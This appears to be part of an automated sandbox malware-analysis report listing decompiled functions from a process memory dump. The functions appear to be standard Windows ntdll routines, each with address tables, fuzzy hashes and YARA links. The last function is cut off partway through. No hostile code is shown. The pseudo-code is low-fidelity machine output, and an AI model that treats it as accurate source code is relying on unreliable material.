                                                                                                                                                    Function 03143884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E03143884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03109650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L030E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03109650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                                                    0x03143893
                                                                                                                                                    0x03143896
                                                                                                                                                    0x03143899
                                                                                                                                                    0x0314389f
                                                                                                                                                    0x031438a0
                                                                                                                                                    0x031438a4
                                                                                                                                                    0x031438a9
                                                                                                                                                    0x031438ac
                                                                                                                                                    0x031438ad
                                                                                                                                                    0x031438ae
                                                                                                                                                    0x031438af
                                                                                                                                                    0x031438b1
                                                                                                                                                    0x031438b4
                                                                                                                                                    0x031438bb
                                                                                                                                                    0x031438bc
                                                                                                                                                    0x031438bd
                                                                                                                                                    0x031438c4
                                                                                                                                                    0x031438c8
                                                                                                                                                    0x031438ca
                                                                                                                                                    0x031438ca
                                                                                                                                                    0x031438d5
                                                                                                                                                    0x0314393e
                                                                                                                                                    0x03143940
                                                                                                                                                    0x03143942
                                                                                                                                                    0x03143952
                                                                                                                                                    0x03143954
                                                                                                                                                    0x03143961
                                                                                                                                                    0x03143961
                                                                                                                                                    0x03143967
                                                                                                                                                    0x0314396e
                                                                                                                                                    0x0314396e
                                                                                                                                                    0x03143947
                                                                                                                                                    0x0314394c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0314394c
                                                                                                                                                    0x031438ea
                                                                                                                                                    0x031438ee
                                                                                                                                                    0x031438f8
                                                                                                                                                    0x031438f9
                                                                                                                                                    0x031438ff
                                                                                                                                                    0x03143900
                                                                                                                                                    0x03143902
                                                                                                                                                    0x03143903
                                                                                                                                                    0x0314390b
                                                                                                                                                    0x0314390f
                                                                                                                                                    0x03143950
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03143950
                                                                                                                                                    0x03143915
                                                                                                                                                    0x0314391d
                                                                                                                                                    0x0314391d
                                                                                                                                                    0x03143922
                                                                                                                                                    0x03143926
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03143928
                                                                                                                                                    0x0314392b
                                                                                                                                                    0x0314392b
                                                                                                                                                    0x03143935
                                                                                                                                                    0x03143937
                                                                                                                                                    0x03143937
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03143935
                                                                                                                                                    0x03143926
                                                                                                                                                    0x031438f0
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID: BinaryName
                                                                                                                                                    • API String ID: 2994545307-215506332
                                                                                                                                                    • Opcode ID: 191bd2213f3f5207e046f7165d305bb2c51c27569bd875c12a346002d36e3f9e
                                                                                                                                                    • Instruction ID: cd5d3cd410329b14c58091a09ac0fa1a076fc92e06b2853b18a8947e2ab948ff
                                                                                                                                                    • Opcode Fuzzy Hash: 191bd2213f3f5207e046f7165d305bb2c51c27569bd875c12a346002d36e3f9e
                                                                                                                                                    • Instruction Fuzzy Hash: 1A31493AD0160ABFEB15DB59C841DBFF774EB88720F054569E824A7290D730DE10C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                                    			E030FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x31bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E030E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0310B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E031098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E031095D0();
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                                    0x030fd29c
                                                                                                                                                    0x030fd2a6
                                                                                                                                                    0x030fd2b1
                                                                                                                                                    0x030fd2b5
                                                                                                                                                    0x030fd2b6
                                                                                                                                                    0x030fd2bc
                                                                                                                                                    0x030fd2bd
                                                                                                                                                    0x030fd2be
                                                                                                                                                    0x030fd2bf
                                                                                                                                                    0x030fd2c2
                                                                                                                                                    0x030fd2c4
                                                                                                                                                    0x030fd2cc
                                                                                                                                                    0x030fd384
                                                                                                                                                    0x030fd34b
                                                                                                                                                    0x030fd34f
                                                                                                                                                    0x030fd350
                                                                                                                                                    0x030fd351
                                                                                                                                                    0x030fd35c
                                                                                                                                                    0x030fd35c
                                                                                                                                                    0x030fd2d6
                                                                                                                                                    0x030fd2da
                                                                                                                                                    0x030fd2e1
                                                                                                                                                    0x030fd361
                                                                                                                                                    0x030fd369
                                                                                                                                                    0x030fd36d
                                                                                                                                                    0x030fd2e3
                                                                                                                                                    0x030fd2e3
                                                                                                                                                    0x030fd2e3
                                                                                                                                                    0x030fd2e5
                                                                                                                                                    0x030fd2ed
                                                                                                                                                    0x030fd2f5
                                                                                                                                                    0x030fd2fa
                                                                                                                                                    0x030fd302
                                                                                                                                                    0x030fd303
                                                                                                                                                    0x030fd30b
                                                                                                                                                    0x030fd30f
                                                                                                                                                    0x030fd313
                                                                                                                                                    0x030fd318
                                                                                                                                                    0x030fd31c
                                                                                                                                                    0x030fd320
                                                                                                                                                    0x030fd379
                                                                                                                                                    0x030fd37d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313affe
                                                                                                                                                    0x0313b001
                                                                                                                                                    0x0313b011
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fd322
                                                                                                                                                    0x030fd322
                                                                                                                                                    0x030fd330
                                                                                                                                                    0x030fd337
                                                                                                                                                    0x030fd35d
                                                                                                                                                    0x030fd339
                                                                                                                                                    0x030fd33f
                                                                                                                                                    0x030fd38c
                                                                                                                                                    0x030fd38c
                                                                                                                                                    0x030fd33f
                                                                                                                                                    0x030fd349
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fd349

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                    • Opcode ID: a2c06c273e732ecf2a99d8d6f6325a8f5001e2dd319ab63f971a6aa0713ffedc
                                                                                                                                                    • Instruction ID: 5aff70e33400c3b1ef3eb4e85555a1076ecac7a95c7f9655d9647e904df05f2e
                                                                                                                                                    • Opcode Fuzzy Hash: a2c06c273e732ecf2a99d8d6f6325a8f5001e2dd319ab63f971a6aa0713ffedc
                                                                                                                                                    • Instruction Fuzzy Hash: AB31B1B660A3059FC751DF28C8809AFBBE8EBC9654F04092EFA9487650D734DD04CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E030D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0310BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0310A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0310A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L030E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                                                    0x030d1b8f
                                                                                                                                                    0x030d1b9a
                                                                                                                                                    0x030d1b9c
                                                                                                                                                    0x030d1b9e
                                                                                                                                                    0x030d1ba3
                                                                                                                                                    0x03127010
                                                                                                                                                    0x03127010
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d1ba9
                                                                                                                                                    0x030d1ba9
                                                                                                                                                    0x030d1bae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d1bc5
                                                                                                                                                    0x030d1bca
                                                                                                                                                    0x030d1bcf
                                                                                                                                                    0x030d1bd0
                                                                                                                                                    0x030d1bd1
                                                                                                                                                    0x030d1bd2
                                                                                                                                                    0x030d1bd6
                                                                                                                                                    0x030d1bdc
                                                                                                                                                    0x030d1be0
                                                                                                                                                    0x03126ffc
                                                                                                                                                    0x03127000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03127006
                                                                                                                                                    0x03127009
                                                                                                                                                    0x03127009
                                                                                                                                                    0x030d1be6
                                                                                                                                                    0x030d1bec
                                                                                                                                                    0x030d1c0b
                                                                                                                                                    0x030d1c0b
                                                                                                                                                    0x030d1c0c
                                                                                                                                                    0x030d1c11
                                                                                                                                                    0x030d1c12
                                                                                                                                                    0x030d1c15
                                                                                                                                                    0x030d1c1b
                                                                                                                                                    0x030d1c1f
                                                                                                                                                    0x030d1c31
                                                                                                                                                    0x030d1c33
                                                                                                                                                    0x03127026
                                                                                                                                                    0x03127026
                                                                                                                                                    0x030d1c21
                                                                                                                                                    0x030d1c24
                                                                                                                                                    0x030d1c24
                                                                                                                                                    0x030d1bee
                                                                                                                                                    0x030d1bee
                                                                                                                                                    0x030d1bf2
                                                                                                                                                    0x030d1c3a
                                                                                                                                                    0x030d1bf4
                                                                                                                                                    0x030d1bf4
                                                                                                                                                    0x030d1c05
                                                                                                                                                    0x030d1c05
                                                                                                                                                    0x030d1c09
                                                                                                                                                    0x030d1c3e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d1c09
                                                                                                                                                    0x030d1bec
                                                                                                                                                    0x030d1be0
                                                                                                                                                    0x030d1bae
                                                                                                                                                    0x030d1c2e

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: WindowsExcludedProcs
                                                                                                                                                    • API String ID: 0-3583428290
                                                                                                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                    • Instruction ID: 17e8391c6445ab23532096026cd7cfa6d1734261492ef9a8abce4716598ff916
                                                                                                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                    • Instruction Fuzzy Hash: 9C210476602328ABCB65DA55C840FAFBBEDEF89A50F0A4465FD049B240DB30DC10D7A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                                                    0x030ef71d
                                                                                                                                                    0x030ef722
                                                                                                                                                    0x030ef726
                                                                                                                                                    0x03134770
                                                                                                                                                    0x030ef765
                                                                                                                                                    0x030ef769
                                                                                                                                                    0x030ef769
                                                                                                                                                    0x030ef732
                                                                                                                                                    0x0313477a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313477a
                                                                                                                                                    0x030ef738
                                                                                                                                                    0x030ef73a
                                                                                                                                                    0x030ef73c
                                                                                                                                                    0x030ef73f
                                                                                                                                                    0x030ef746
                                                                                                                                                    0x030ef778
                                                                                                                                                    0x030ef7a9
                                                                                                                                                    0x030ef7a9
                                                                                                                                                    0x030ef754
                                                                                                                                                    0x030ef75a
                                                                                                                                                    0x030ef75d
                                                                                                                                                    0x030ef75f
                                                                                                                                                    0x030ef761
                                                                                                                                                    0x030ef76f
                                                                                                                                                    0x030ef771
                                                                                                                                                    0x030ef771
                                                                                                                                                    0x030ef76f
                                                                                                                                                    0x030ef763
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef763
                                                                                                                                                    0x030ef77d
                                                                                                                                                    0x030ef7a3
                                                                                                                                                    0x030ef7a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef7a5
                                                                                                                                                    0x030ef77f
                                                                                                                                                    0x030ef782
                                                                                                                                                    0x030ef784
                                                                                                                                                    0x030ef786
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef788
                                                                                                                                                    0x030ef748
                                                                                                                                                    0x030ef74d
                                                                                                                                                    0x030ef78d
                                                                                                                                                    0x030ef793
                                                                                                                                                    0x030ef7b7
                                                                                                                                                    0x030ef7bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef7bc
                                                                                                                                                    0x030ef798
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef79d
                                                                                                                                                    0x030ef7b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef7b0
                                                                                                                                                    0x030ef79f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef74f
                                                                                                                                                    0x030ef74f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ef74f

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Actx
                                                                                                                                                    • API String ID: 0-89312691
                                                                                                                                                    • Opcode ID: 44ce839dbdee265f5343b53c1ded5ebc330df092f6566d76cc6831a2fe8ce18f
                                                                                                                                                    • Instruction ID: e5d505a4ae9138b3c378f8fb3428424a20d8813a0fdb746277af0792cff1cba9
                                                                                                                                                    • Opcode Fuzzy Hash: 44ce839dbdee265f5343b53c1ded5ebc330df092f6566d76cc6831a2fe8ce18f
                                                                                                                                                    • Instruction Fuzzy Hash: 6E11B935306A038FE764CD1D845073BB2D9EB86654F2B492AD8E5CB391DB70C840A340
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03178DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                    			E03178DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x31a0d50);
				E0311D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03155720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0311DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0311DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0311D130(_t34, _t39, _t40);
			}





                                                                                                                                                    0x03178df1
                                                                                                                                                    0x03178df1
                                                                                                                                                    0x03178df1
                                                                                                                                                    0x03178df1
                                                                                                                                                    0x03178df1
                                                                                                                                                    0x03178df1
                                                                                                                                                    0x03178df3
                                                                                                                                                    0x03178df8
                                                                                                                                                    0x03178dfd
                                                                                                                                                    0x03178e00
                                                                                                                                                    0x03178e0e
                                                                                                                                                    0x03178e2a
                                                                                                                                                    0x03178e36
                                                                                                                                                    0x03178e38
                                                                                                                                                    0x03178e3c
                                                                                                                                                    0x03178e46
                                                                                                                                                    0x03178e46
                                                                                                                                                    0x03178e36
                                                                                                                                                    0x03178e50
                                                                                                                                                    0x03178e56
                                                                                                                                                    0x03178e59
                                                                                                                                                    0x03178e5c
                                                                                                                                                    0x03178e60
                                                                                                                                                    0x03178e67
                                                                                                                                                    0x03178e6d
                                                                                                                                                    0x03178e73
                                                                                                                                                    0x03178e74
                                                                                                                                                    0x03178eb1
                                                                                                                                                    0x03178ebd

                                                                                                                                                    Strings
                                                                                                                                                    • Critical error detected %lx, xrefs: 03178E21
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Critical error detected %lx
                                                                                                                                                    • API String ID: 0-802127002
                                                                                                                                                    • Opcode ID: 47da6d6ffc1db9a2f223101acf5a752f69bd5b972d973073812d49d245154073
                                                                                                                                                    • Instruction ID: 9a57ed176b888bd354ee8db4f668044148737ce0eb95a92b1bad54cc63f31193
                                                                                                                                                    • Opcode Fuzzy Hash: 47da6d6ffc1db9a2f223101acf5a752f69bd5b972d973073812d49d245154073
                                                                                                                                                    • Instruction Fuzzy Hash: D2116D75D25348EBDF28CFA8990A7ECFBB1BB08315F28426DE4296B282C7340611CF15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0315FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0315FF60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                    • API String ID: 0-1911121157
                                                                                                                                                    • Opcode ID: 87f417af5f8cf74c72db456e3d7c87f50b8a21de73e7b5dabad01cc5435e5914
                                                                                                                                                    • Instruction ID: 2244b5f0f31cbe449340f4e544d261bcd3d687a9ae092d726dcca86dac4b3076
                                                                                                                                                    • Opcode Fuzzy Hash: 87f417af5f8cf74c72db456e3d7c87f50b8a21de73e7b5dabad01cc5435e5914
                                                                                                                                                    • Instruction Fuzzy Hash: 93110476510244EFCB12EB50C948FDCB7B2FF0D704F188054F509AB6A1C7389951CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03195BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E03195BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x31a1178);
				E0311D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03194C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0310D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03195542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
